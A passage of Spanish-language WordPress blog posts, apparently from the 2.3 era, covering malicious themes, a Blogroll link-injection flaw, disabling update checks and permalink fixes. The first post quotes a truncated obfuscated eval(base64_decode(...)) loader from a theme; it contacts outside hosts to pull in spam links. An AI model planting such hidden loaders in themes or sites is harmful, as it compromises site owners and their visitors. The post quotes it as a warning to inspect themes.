Andres nieto nos platica que, algunos temas de wordpress, podrían afectar a nuestro blog, inyectando código malicioso.

Este código, hacia que se insertaran links, en nuestros tema , sin nuestro consentimiento.

El caso quizás descubrió, se trata de sitios como WP-Shere, que usan un sistema algo más escondido como el siguiente.

@eval(@base64_decode(’aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\jY3MzVBQkMzMDk
xNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\LCA4MCwgJFIzMkQw
MDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\gJFI1RjUyNUY1QjM5OER
BREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\SNTBGNUY5QzgwRjEyRkZBRThCMjQwM
DUyOEU4MUIzNEUgPSAid3Bzc3I\OyBlbHNlaWYoJFIzN0MwM
TREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD\kxNiA9IEBmc29ja29wZW4oInd
3dy53cHNuYy5jb20iLCA4MCwgJFIzMk\QwMDA
3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1Qj\M5OERBREQ.....

Dada la flexibilidad de WordPress, hay que tener cuidado sobre los themes que descargamos y examinarlos antes de usarlos, así fue como yo modifique este tema que era de 2 columnas y se volvieron 3.

así que ya saben, para la próxima le echan un vistazo al código antes de usarlo.

via | Vuelven los problemas con los themes de WordPress

Resulta que wordpress 2.3 tiene una vulnerabilidad que puede ser de una herramienta para los spammers.

Pues la vulnerabilidad detectada permite que se añadan directamente enlaces a nuestro Blogroll, agregando con esto enlaces a sitios que no deseamos, y sin que uno se entere.

Por suerte ya esta corregido las instrucciones para solucionarlos son las siguientes.

1. Haz un respaldo de el archivo link.php que esta ubicando en la carpeta wp-admin/
2. Descargar el nuevo archivo link.phpcorregido desde aqui
3. subirlo a la carpeta wp-admin/
4. Listo

Via | anieto2k

Ultimamente he andado muy ocupado pero prometo estar posteando siempre que pueda .

Pero mientras preparo unos manuales para todos, les paso una buena coleccion de themes para nuestro wordpress, ya que cuando tenemos un blog, lo unico que casi nunca nos convence a veces es el tema de nuestro blog.

Aqui unas imagenes de los temas yo usaba el itheme.

El otro dia encontre unos temas que casi nunca habia visto.

Estos temas son para wordpress, y sin duda habra mas de uno que quizas les llegue a interesar, yo baje algunos para checarlos aunque, estoy desarrollando uno propio, para el blog, en el cual cambiar la estructura pero no cambiara mucho los colores.

Bueno les unas capturas con sus enlaces y ahi los checan.

Mas temas en | http://biboz.net/themes/

Si no pudieron ver el blog por un rato fue porque porfin lo actualice a wordpress 2.3, subi los plugins y cheque que funcionara correctamente el tema.

Todo hubiera sido muy facil, de no ser porque wordpress no me dejo exportar los post, en pocas palabras no pude exportar nada.

Asi que tuve que eliminar el blog por completo y hacerlo de nuevo, estuvo pesado pero ya casi termino, por eso si en el listado de categorias no ven muchos post, es porque estoy …mmm digamos categorizandolo organizando en categorias.

Les invito a se suscriban por feeds al blog o via E-mail, para saber todo lo referente a este blog.

Saludos del Ajaxman……….

nota: Ya me voy a dormir ya son como las 2 am hora de mexico y tengo sueño…..mañana termino de actualizar

De seguro que ya muchos tendrán actualizado su wordpress a la version 2.3 si embargo leí en varios blog entre ello el de Andres Nieto, que resulta que son enviados algunos datos a wordpress.

información que al parecer servirá para estadísticas, sin embargo puede servir quizas para realizar algun ataque aunque no es seguro.

Por ello es recomendable desactivarlo, para poder desactivarlo, tenemos varias opciones entre ellas.

1 Eliminarlo
El sistema de para añadir acciones a WordPress permite que eliminar este sistema sea tan simple como hacer los siguientes 2 pasos.

Buscamos la línea siguiente dentro del fichero wp-admin/includes/update.php (sobre la línea 106)

.
..
add_action( ‘load-plugins.php’, ‘wp_update_plugins’ );
.
..

Le añadimos un (#) delante de la línea,

.
..
#add_action( ‘load-plugins.php’, ‘wp_update_plugins’ );
.
..

2 No enviando tu verdadera URL

Hace rato me envió un mail el seraphinux, sobre un como hacer un cambio a permalinks en el modrewrite.

En teoría es fácil, sin embargo en algunos hostings, pueden haber deshabilitado la lectura del archivo .htaccess y cambiar los permalinks nos dará un verdadero dolor de cabeza, si no checamos la solución correcta, a continuación describo una solución que encontré.

Resulta que cuando le decimos a wordpress que utilice permalinks, crea un archivo .Htacces, sin embargo como no se puede leer, te genera problemas, inclusive se puede caer tu sitio web.

Entonces es necesario hacerlo manualmente el cambio de los permalinks y de las reglas del modrewrite.

Las reglas del modrewrite se pueden agregar en un Vhost, por ejemplo o decirle a nuestro administrador que las agrege a nuestro Vhost

Sin embargo cuando uno decidas que estructura de permalinks usar, debemos hacer los cambios desde la base de datos, no donde dice permalinks dentro de las opciones de wordpress.

En la base de datos de nuestro wordpress, debe de haber una tabla que se llama

WP_options buscan el campo option name y localizan el valor permalinks_structure, en ese registro checan el contenido de option value, por default esta vacio ahi es donde debes de decirle que estructura usaras.

La mia es /%post_id%/%postname%/

Le puedes poner alguna de estas.

Estructura de las Etiquetas